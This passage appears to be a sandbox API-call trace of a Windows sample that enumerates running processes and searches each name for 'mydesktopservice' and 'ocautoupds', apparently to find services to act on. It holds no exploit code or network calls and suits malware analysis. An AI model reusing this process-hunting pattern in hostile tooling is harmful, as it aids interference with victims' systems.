dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.311] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a920 [0094.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356a920, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0094.312] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0094.312] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="mydesktopservice") returned 0x0 [0094.312] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.313] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356cab8 [0094.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356cab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.313] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0094.313] StrStrIA (lpFirst="conhost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.313] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.314] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356cb18 [0094.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356cb18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.314] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0094.314] StrStrIA (lpFirst="conhost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.314] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.316] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356cb90 [0094.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356cb90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.316] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.316] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.316] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0094.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.317] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ca58 [0094.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x356ca58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0094.317] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0094.317] StrStrIA (lpFirst="rxodge.exe", lpSrch="mydesktopservice") returned 0x0 [0094.317] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0094.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.319] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356cb60 [0094.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x356cb60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0094.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0094.319] StrStrIA (lpFirst="sppsvc.exe", lpSrch="mydesktopservice") returned 0x0 [0094.319] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0094.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.321] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d1c8 [0094.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x356d1c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0094.321] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0094.321] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="mydesktopservice") returned 0x0 [0094.321] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0094.321] CloseHandle (hObject=0x358) returned 1 [0094.321] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0094.338] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.339] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356d1e8 [0094.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x356d1e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0094.339] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0094.339] StrStrIA (lpFirst="[System Process]", lpSrch="ocautoupds") returned 0x0 [0094.339] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0094.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0094.340] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547a48 [0094.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547a48, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0094.340] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0094.340] StrStrIA (lpFirst="System", lpSrch="ocautoupds") returned 0x0 [0094.340] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0094.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.342] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356cb78 [0094.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x356cb78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0094.342] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0094.342] StrStrIA (lpFirst="smss.exe", lpSrch="ocautoupds") returned 0x0 [0094.342] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.343] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356cbf0 [0094.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356cbf0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0094.343] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0094.343] StrStrIA (lpFirst="csrss.exe", lpSrch="ocautoupds") returned 0x0 [0094.343] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0094.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.345] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ca70 [0094.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x356ca70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0094.345] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0094.345] StrStrIA (lpFirst="wininit.exe", lpSrch="ocautoupds") returned 0x0 [0094.345] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.346] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356cbd8 [0094.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356cbd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0094.346] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0094.346] StrStrIA (lpFirst="csrss.exe", lpSrch="ocautoupds") returned 0x0 [0094.346] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0094.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.348] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ca88 [0094.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x356ca88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0094.348] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0094.348] StrStrIA (lpFirst="winlogon.exe", lpSrch="ocautoupds") returned 0x0 [0094.348] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0094.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.349] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ca40 [0094.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x356ca40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0094.349] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0094.349] StrStrIA (lpFirst="services.exe", lpSrch="ocautoupds") returned 0x0 [0094.349] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0094.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.350] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356cb00 [0094.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x356cb00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0094.350] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0094.350] StrStrIA (lpFirst="lsass.exe", lpSrch="ocautoupds") returned 0x0 [0094.350] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.352] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356cad0 [0094.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356cad0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.352] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.352] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.352] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0094.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.353] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356caa0 [0094.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356caa0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0094.353] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0094.353] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="ocautoupds") returned 0x0 [0094.353] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0094.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.354] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356cae8 [0094.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356cae8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0094.354] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0094.354] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="ocautoupds") returned 0x0 [0094.354] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.356] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356cb30 [0094.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356cb30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.356] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.356] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.356] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0094.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.357] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547a58 [0094.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3547a58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0094.357] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0094.357] StrStrIA (lpFirst="dwm.exe", lpSrch="ocautoupds") returned 0x0 [0094.357] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.359] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356cba8 [0094.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356cba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.359] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.359] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.359] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.360] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356cb48 [0094.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356cb48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.360] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.360] StrStrIA (lpFirst="svchost.exe", 